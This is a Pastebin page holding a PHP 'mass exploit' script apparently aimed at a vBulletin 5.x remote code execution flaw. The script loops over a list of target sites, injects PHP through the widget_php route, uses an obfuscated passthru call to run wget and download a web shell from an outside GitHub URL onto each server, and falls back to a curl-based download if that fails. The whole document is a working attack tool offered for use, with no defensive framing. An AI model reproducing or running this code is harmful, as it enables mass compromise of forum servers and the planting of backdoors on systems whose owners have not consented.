ToKeiChun

vBulletin 5.x 0day Auto Exploit [php7]

Oct 5th, 2019
2,440
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.74 KB | None | 0 0
  1. <?php
  2. ### Con7ext
  3. ### Exploit-Kita
  4. function xCurl($url, $post = null){
  5. $x = curl_init();
  6. curl_setopt($x, CURLOPT_URL, $url);
  7. curl_setopt($x, CURLOPT_RETURNTRANSFER, true);
  8. curl_setopt($x, CURLOPT_TIMEOUT, 5);
  9. if($post && !empty($post)){
  10. curl_setopt($x, CURLOPT_POSTFIELDS, $post);
  11. }
  12. $xx = curl_exec($x);
  13. $h = curl_getinfo($x, CURLINFO_HTTP_CODE);
  14. return [
  15. "head" => $h,
  16. "body" => $xx
  17. ];
  18. }
  19. if(!$argv[1]){
  20. exit("Usage: php ".$argv[0]." <LIST>");
  21. }
  22. $bl = "\033[0;34m";
  23. $gr = "\033[0;32m";
  24. $re = "\033[0;31m";
  25. $wh = "\033[1;37m";
  26. $shellname = "uploader.php"; // setting uploader name
  27. $payloadV = "routestring=ajax/render/widget_php&widgetConfig[code]=echo 'rintod'; exit;";
  28. $payloadS = 'routestring=ajax/render/widget_php&widgetConfig[code]=echo $a="pass";$b="thru";$c=$a.$b; $c("wget https://raw.githubusercontent.com/rintod/toolol/master/payload.php -O '.$shellname.'"); exit;';
  29. $payloadB = 'routestring=ajax/render/widget_php&widgetConfig[code]=$ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://raw.githubusercontent.com/rintod/toolol/master/payload.php"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $ajg = curl_exec($ch);$f=fopen("'.$shellname.'", "a+");fwrite($f, $ajg);fclose($f);echo "rintod";exit;';
  30. $m = file_get_contents($argv[1]);
  31. $c = explode("\n", $m);
  32. echo "
  33. __________ .__ .__ __ .__
  34. ___ _\______ \__ __| | | | _____/ |_|__| ____
  35. \ \/ /| | _/ | \ | | | _/ __ \ __\ |/ \
  36. \ / | | \ | / |_| |_\ ___/| | | | | \
  37. \_/ |______ /____/|____/____/\___ >__| |__|___| /
  38. Exploit-Kita \/ MASS EXPLOIT \/ Con7ext \/\n
  39. ";
  40. foreach($c as $s){
  41. $mek = xCurl($s, $payloadV);
  42. if(preg_match("/rintod/", $mek["body"])){
  43. echo "[$bl+$wh] ". $s . " > {$gr}Vuln$wh\n";
  44. //echo $mek["body"];
  45. echo "[$bl+$wh] {$bl}Uploading Shell$wh\n";
  46. xCurl($s, $payloadS);
  47. echo "[$bl+$wh] {$bl}Checking Shell$wh\n";
  48. $moe = xCurl($s."/".$shellname);
  49. if($moe["head"] == 200){
  50. echo "[$bl+$wh] {$gr}{$s}/$shellname > Shell Found$wh\n\n";
  51. }
  52. else{
  53. echo "[$re-$wh] {$re}{$s}/$shellname > Shell Not Found $wh [$gr!$wh] {$bl}Trying To Bypass!!!$wh\n";
  54. echo "[$bl+$wh] {$bl}Get Content$wh\n";
  55. $mox = xCurl($s, $payloadB);
  56. if(preg_match("/rintod/", $mox["body"])){
  57. echo "[$bl+$wh] {$gr}{$s}/$shellname > Bypass Success$wh\n\n";
  58. }
  59. else{
  60. echo "[$re-$wh] {$re}{$s}/$shellname > Bypass Failed $wh [$bl!$wh] Try Manual\n\n";
  61. //echo $mox["body"];
  62. }
  63. }
  64. }
  65. else{
  66. echo "[$re-$wh] {$re}". $s . " > Failed$wh\n\n";
  67. }
  68. }
  69. echo $wh;
Add Comment
Please, Sign In to add comment